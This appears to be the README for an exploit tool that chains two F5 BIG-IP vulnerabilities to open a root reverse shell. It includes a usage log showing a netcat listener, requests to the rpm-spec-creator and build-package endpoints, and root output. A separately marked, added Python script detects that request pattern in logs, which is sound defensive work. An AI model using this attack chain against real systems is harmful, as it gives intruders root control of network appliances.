# Tippa My Tongue

Tippa My Tongue is an exploit that uses CVE-2022-1388 and CVE-2022-41800 to establish a `root` reverse shell on F5 BIG-IP products. Most CVE-2022-1388 exploits achieve code execution using `/mgmt/tm/util/bash`. This exploit instead uses `/mgmt/shared/iapp/rpm-spec-creator`, followed by `/mgmt/shared/iapp/build-package`. This approach was first suggested by Ron Bowes in an AttackerKB analysis, although, to my knowledge, no one had published a CVE-2022-1388 exploit that did just that.

For more details, read the VulnCheck writeup.
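A defender-side check for the request pattern described above, as an added example that is not part of the original repository: it flags any client that requests `rpm-spec-creator` and then `build-package` within a short window, alongside the more commonly watched `/mgmt/tm/util/bash`. The combined-log-style line layout, the five-minute window, and the sample lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Endpoints named on this page.
SPEC = "/mgmt/shared/iapp/rpm-spec-creator"
BUILD = "/mgmt/shared/iapp/build-package"
BASH = "/mgmt/tm/util/bash"

# Assumed combined-log-style layout: client, [timestamp], "METHOD path ...".
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*"')
WINDOW = timedelta(minutes=5)  # assumed correlation window


def detect(lines, window=WINDOW):
    """Return (client, rule, timestamp) alerts from time-ordered log lines."""
    alerts = []
    last_spec = {}  # client -> time of its most recent rpm-spec-creator request
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        client, ts, path = m.groups()
        path = path.split("?", 1)[0].rstrip("/")
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        if path == BASH:
            alerts.append((client, "util-bash", when))
        elif path == SPEC:
            last_spec[client] = when
        elif path == BUILD:
            seen = last_spec.get(client)
            if seen is not None and timedelta(0) <= when - seen <= window:
                alerts.append((client, "spec-then-build", when))
    return alerts


# Constructed sample lines (documentation-range addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [01/Feb/2023:10:00:00 +0000] "POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Feb/2023:10:00:01 +0000] "POST /mgmt/shared/iapp/build-package HTTP/1.1" 401 0',
    '192.0.2.10 - - [01/Feb/2023:10:00:02 +0000] "POST /mgmt/shared/iapp/build-package HTTP/1.1" 202 128',
    '203.0.113.5 - - [01/Feb/2023:10:30:00 +0000] "POST /mgmt/shared/iapp/build-package HTTP/1.1" 202 128',
    '203.0.113.9 - - [01/Feb/2023:11:00:00 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 200 64',
]

if __name__ == "__main__":
    for client, rule, when in detect(SAMPLE):
        print(when.isoformat(), client, rule)
```

Any legitimate use of these two endpoints from the same client will also match, so the alert is a lead for review of who called the management API and from where, not a verdict.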

## Usage Example:

```
albinolobster@mournland:~/tippa-my-tongue$ python3 --rhost --lhost

[+] Executing netcat listener
[+] Using /usr/bin/nc
Listening on 1270
[+] Sending initial request to rpm-spec-creator
[+] Sending exploit attempt request to build-package
Connection received on 47152
bash: no job control in this shell
[@localhost:NO LICENSE:Standalone] BUILD # pwd
[@localhost:NO LICENSE:Standalone] BUILD # id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[@localhost:NO LICENSE:Standalone] BUILD #
```

## Acknowledgements

* Ron Bowes: for discovering these endpoints and sharing them with the world
* RHCP: for being funky